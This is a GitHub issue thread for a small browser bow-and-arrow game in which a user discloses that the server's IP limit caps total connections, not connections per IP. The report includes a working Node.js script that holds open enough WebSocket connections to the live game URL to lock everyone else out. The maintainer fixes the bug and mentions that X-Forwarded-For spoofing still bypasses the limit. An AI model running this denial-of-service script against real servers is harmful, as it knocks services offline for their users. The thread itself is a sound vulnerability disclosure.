ZeroTixDev / Darrows

pvp io game that uses bow and arrows - sequel to death arrows
1 star, 4 forks

[HIGH] IP limit broken. #24

Closed 10maurycy10 closed 2 years ago

10maurycy10 commented 2 years ago

The current IP limit code caps total connections to 6, not connections/ip.

This allows a trivial complete denial of service attack with minimal resources.

```js
const WebSocket = require("ws")

const url = "wss://darrows.zerotixdev.repl.co/"
const count = 7; // One more than the connection cap.

const cons = []; // array for open connections
function connect() { // function that connects and reconnects to the server.
    console.log("checking connection status...")
    for (let i = 0; i < count; i++) { // for all connection slots... (let, so each handler keeps its own i)
        if (!cons[i]) { // if connection slot is not full...
            cons[i] = new WebSocket(url) // open connection
            console.log(`connection ${i} connecting.`)
            cons[i].onclose = () => { // If connection closes, remove entry and log.
                console.log(`connection ${i} dropped.`)
                delete cons[i];
            }
            cons[i].onerror = () => {} // ws throws on an unhandled error event; onclose still fires and frees the slot
        }
    }
}
setInterval(() => connect(), 1000) // (re)connect every second.
```

There, I dropped the code.

ZeroTixDev commented 2 years ago

Why would the current IP limit code cap total connections to the game at 6 people instead of per IP? Weird. Was this an issue after the current update, or was it always a bug and I just never noticed?


```js
reachedIpLimit: function (ips, ip, limit) {
    // ips: addresses of the currently connected clients; count how many equal `ip`.
    let count = 0;
    for (let i = 0; i < ips.length; i++) {
        if (ip === ips[i]) {
            count++;
            if (count >= limit) {
                return true;
            }
        }
    }
    return count >= limit;
}
```
10maurycy10 commented 2 years ago

@ZeroTixDev The bug is new; previously, I was able to create hundreds of simultaneous connections.

ZeroTixDev commented 2 years ago

Fixed. (However, you can still technically spoof X-Forwarded-For, but at least the IP limit works as intended when you don't try to spoof.)